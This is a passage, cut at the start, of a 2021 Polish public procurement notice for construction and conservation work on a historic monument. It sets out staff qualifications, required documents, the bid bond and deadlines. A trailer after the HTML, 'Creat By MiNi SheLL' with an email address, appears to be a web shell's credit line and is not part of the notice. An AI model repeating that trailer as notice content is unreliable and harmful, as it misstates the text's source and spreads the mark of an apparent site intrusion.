niniejszym zamówieniu na stronie internetowej<br/>Zamawiającego. Średnie kursy walut dostępne są na stronie internetowej Narodowego Banku<br/>Polskiego pod następującym adresem: http://www.nbp.pl/.II Wykonawca wskaże osoby do<br/>wykonania niniejszego zamówienia wraz z informacjami na temat ich wykształcenia, kwalifikacji<br/>zawodowych, doświadczenia, a także zakresu wykonywanych przez nią czynności, która spełnia<br/>następujące warunki:1) jedna osoba, która będzie pełniła funkcję kierownika budowy,<br/>posiadającą uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie<br/>do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, spełniająca<br/>Ogłoszenie nr 2021/BZP 00046648/01 z dnia 2021-05-05<br/>2021-05-05 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>wymagania o których mowa w art. 37c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i<br/>opiece nad zabytkami (tj. Dz. U. z 2017r. poz 2187 ze zm..) tj. która przez co najmniej 18<br/>miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych<br/>wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury.2) jedna osoba, która<br/>będzie pełniła funkcję kierownika prac konserwatorskich, spełniająca wymagania, o których<br/>mowa w art. 37a ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (Dz.<br/>U. z 2017r. poz 2187 ze zm.) tj. która: ukończyła studia drugiego stopnia lub jednolite studia<br/>magisterskie, w zakresie konserwacji i restauracji dzieł sztuki lub konserwacji zabytków oraz<br/>która po rozpoczęciu studiów drugiego stopnia lub po zaliczeniu szóstego semestru jednolitych<br/>studiów magisterskich przez co najmniej 9 miesięcy brała udział w pracach konserwatorskich,<br/>pracach restauratorskich lub badaniach konserwatorskich, prowadzonych przy zabytkach<br/>wpisanych do rejestru, inwentarza muzeum będącego instytucją kultury lub zaliczanych do<br/>jednej z kategorii, o których mowa w art. 14a ust. 2. UstawyZamawiający dopuszcza możliwość<br/>łączenia ww. funkcji spośród wskazanych powyżej osób, pod warunkiem posiadania przez te<br/>osoby wymaganych uprawnień, kwalifikacji i doświadczenia. Wskazane wyżej uprawnienia<br/>budowlane powinny być wydane na podstawie:- Rozporządzenia Ministra Inwestycji i Rozwoju z<br/>dnia 29 kwietnia 2019r. w sprawie przygotowania zawodowego do wykonywania samodzielnych<br/>funkcji technicznych w budownictwie (Dz. U. z 2019r. poz. 831), lub- odpowiadające im ważne<br/>uprawnienia w zakresie odpowiadającym powyższym wymaganiom, wydane na podstawie<br/>wcześniej obowiązujących przepisówIlekroć powyżej mowa jest o uprawnieniach, to w<br/>przypadku osób będących obywatelami krajów członkowskich Unii Europejskich oznacza to<br/>decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w Rzeczypospolitej<br/>Polskiej samodzielnych funkcji technicznych w budownictwie w zakresie przedmiotu niniejszego<br/>zamówienia – zgodnie z właściwymi przepisami, w szczególności: z ustawą o zasadach uznania<br/>kwalifikacji zawodowych nabytych w krajach członkowskich Unii Europejskiej z dnia 22 grudnia<br/>2015r. (tekst jednolity Dz. U. z 2018r., poz. 2272 ze zm.) oraz Ustawą z dnia 15 grudnia 2000r. o<br/>samorządach zawodowych architektów, inżynierów budownictwa (tekst jednolity Dz. U. z 2019<br/>roku, poz. 1117 ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem<br/>najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych: 1. W zakresie potwierdzenia warunków udziału w<br/>postępowaniu:1) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami– zakresie<br/>niezbędnym do wykazania spełnienia warunku udziału w postępowaniu (wzór stanowi załącznik nr 4<br/>do SWZ);2) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości,<br/>daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz<br/>załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty – w zakresie niezbędnym do<br/>wykazania spełnienia warunku udziału w postępowaniu (wzór stanowi załącznik nr 5 do SWZ);</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz ofertowy sporządzony zgodnie ze wzorem stanowiącym załącznik nr 1 do SWZ,2)Oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału wpostępowaniu<br/>na podstawie art. 125 ust. 1 (wzór oświadczenia stanowi załącznik nr 2 do SWZ). Oświadczenie<br/>składają odrębnie: a) wykonawca/każdy spośród wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia.W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia<br/>wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu; b) podmiot<br/>udostępniający zasoby, na którego potencjał powołuje się Wykonawca celem potwierdzenia<br/>spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza<br/>brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim podmiot udostępnia swoje zasoby Wykonawcy.Wymagana forma – pod<br/>rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.3) odpis lub informację z Krajowego Rejestru Sądowego,<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru<br/>potwierdzającego, że osoba działająca w imieniu wykonawcy jest umocowana do jego<br/>reprezentowania. 4) pełnomocnictwo lub inny dokument potwierdzający umocowanie do<br/>reprezentowania Wykonawcy, gdy umocowanie osoby składającej ofertę nie wynika z<br/>dokumentów opisanych w 11.3.5) w przypadku wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia:a) pełnomocnictwo, w przypadku wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia, z treści którego będzie wynikało umocowanie do reprezentowania<br/>ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego. b) oświadczenie, o którym mowa w pkt 6.4<br/>SWZ (Zamawiający dopuszcza złożenia tego oświadczenia na formularzu ofertowym);6)<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania lub inny podmiotowy środek<br/>dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami podmiotów (jeżeli dotyczy)7) dokumenty przedmiotowe wskazane w pkt<br/>10.1 SWZ. (jeżeli dotyczy)8) dowód wniesienia wadium (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Oferta musi być zabezpieczona wadium w wysokości: 13.000,00 PLN (słownie: trzynaście<br/>tysięcy PLN).2.Wadium należy wnieść przed upływem terminu składania ofert.3.Za termin<br/>wniesienia wadium w pieniądzu zostanie przyjęty termin uznania rachunku<br/>Zamawiającego.4.Wadium może być wnoszone w jednej lub kilku następujących formach:1)<br/>pieniądzu: przelewem na rachunek bankowy Zamawiającego: PKO BP Kędzierzyn-Koźle 57<br/>1020 3714 0000 4102 0108 5455;2) gwarancjach bankowych;3) gwarancjach<br/>ubezpieczeniowych;4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.<br/>5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).5. Wadium wnoszone w formie innej<br/>niż w pieniądzu musi spełniać wymagania wynikające z ustawy Pzp, w szczególności określać<br/>bezwarunkowy, nieodwołalny obowiązek zapłaty na pierwsze żądanie Zamawiającego, w<br/>przypadkach określonych w ustawie Pzp oraz być ważne przez okres związania ofertą,<br/>określony w niniejszej SWZ. Musi być wykonalne na terytorium Rzeczypospolitej<br/>Polskiej.6.Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, wykonawca<br/>przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci<br/>elektronicznej.7.Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7<br/>dni od dnia wystąpienia jednej z okoliczności: 1) upływu terminu związania ofertą; 2) zawarcia<br/>umowy w sprawie zamówienia publicznego; 3) unieważnienia postępowania o udzielenie<br/>zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynnośćunieważnienia albo nie upłynął termin do jego wniesienia. 8.Zamawiający, niezwłocznie, nie<br/>później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium wykonawcy: 1)<br/>który wycofał ofertę przed upływem terminu składania ofert; 2) którego oferta została odrzucona;<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana<br/>jako najkorzystniejsza; 4) po unieważnieniu postępowania, w przypadku gdy nie zostało<br/>rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>9.Złożenie wniosku o zwrot wadium, o którym mowa w pkt 14.8, powoduje rozwiązanie stosunku<br/>prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale IX ustawy Pzp. 10.Zamawiający zatrzymuje wadium wraz z<br/>odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia występuje<br/>odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium w okolicznościach<br/>wskazanych w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają Pełnomocnika do<br/>reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i<br/>zawarcia Umowy. Umocowanie musi wynikać z treści pełnomocnictwa przedłożonego wraz z<br/>ofertą. 2.Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej<br/>lub zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp,<br/>zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej i zrealizuje roboty budowlane, do których realizacji te uprawnienia<br/>są wymagane.3.W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia (o ile zostały sformułowane) wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy<br/>wykonają roboty do realizacji których te zdolności są wymagane.4.W przypadku, o którym mowa<br/>w pkt 6.2 i 6.3, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają<br/>odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają<br/>poszczególni wykonawcy.5.Pełnomocnictwo powinno jednoznacznie określać postępowanie, do<br/>którego się odnosi i precyzować zakres umocowania. Zaleca się, aby Pełnomocnikiem był jeden<br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wszelka korespondencja<br/>będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.6.W przypadku<br/>wykonawców wspólnie ubiegających się o zamówienie, których oferta zostanie uznana za<br/>najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani do<br/>zawarcia umowy cywilnoprawnej określającą rolę i zadania poszczególnych Wykonawców oraz<br/>zasady ich współdziałania podczas realizacji zamówienia. Zamawiający może żądać<br/>przedstawienia wyżej wskazanej umowy.7.Wykonawcy wspólnie ubiegający się o zamówienie<br/>ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia<br/>należytego wykonania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Podstawa zakres, charakter i warunki wprowadzania zmian zostały wskazane w projektowanych<br/>postanowieniach umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-28 12:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://e-propublico.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-28 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonania zamówienia. Zamówienie należy zrealizować w terminie nie dłuższym niż 240 dni kalendarzowych od daty przekazania placu budowy (minimalny oceniany 168 dni kalendarzowych od daty przekazania placu budowy).<br/>Przekazanie placu budowy do 60 dni kalendarzowych licząc od daty zawarcia umowy.<br/>Okres gwarancji wynosi min. 36 miesięcy, licząc od dnia protokołu odbioru końcowego (wartość oceniana).<br/>Okres rękojmi za wady wynosi 5 lat licząc od dnia wykonania zamówienia i uznania przez zamawiającego za należycie wykonane (protokół odbioru końcowego).</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-10 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com